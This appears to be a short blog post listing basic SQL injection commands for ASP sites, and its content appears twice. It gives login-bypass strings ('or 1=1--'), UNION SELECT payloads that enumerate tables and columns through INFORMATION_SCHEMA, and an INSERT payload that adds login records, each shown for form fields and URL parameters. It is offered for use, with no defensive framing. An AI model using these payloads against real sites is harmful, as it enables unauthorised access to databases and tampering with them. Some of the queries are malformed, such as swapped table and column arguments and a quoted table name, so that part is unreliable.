***entering as first person on sql database***
--text box--
login: hi' or 1=1--
pass: hi'or 1=1--
--url bar--
http://site/index.asp?id=hi' or 1=1--
%Note: you can replace the 1's with things like a's or 0's and such
***retreiving table names***
--text box--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
--url bar--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
***to retreive column names***
--text box--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--
%Note replace the '"tablename text with what the tables name is!!!
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--
***retreive getting data from table***
--text box--
UNION SELECT TOP 1 table_name FROM column_name--
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--
***Inserting data into a databse!***
INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--
--url bar--
http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--
End
--text box--
login: hi' or 1=1--
pass: hi'or 1=1--
--url bar--
http://site/index.asp?id=hi' or 1=1--
%Note: you can replace the 1's with things like a's or 0's and such
***retreiving table names***
--text box--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
--url bar--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
***to retreive column names***
--text box--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--
%Note replace the '"tablename text with what the tables name is!!!
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--
***retreive getting data from table***
--text box--
UNION SELECT TOP 1 table_name FROM column_name--
%Note: replace table_name with the name of the table and column name with the name of the column!!!!
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--
***Inserting data into a databse!***
INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--
%Note: replace login_id,Login_name, and password with the names of the columns, replace table_name with the name of the table and the values 111,name,pass to what you want , corresponds in order of colums!
--url bar--
http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--
End
No Responses to “Basic SQL Injection Commands”
Leave a Reply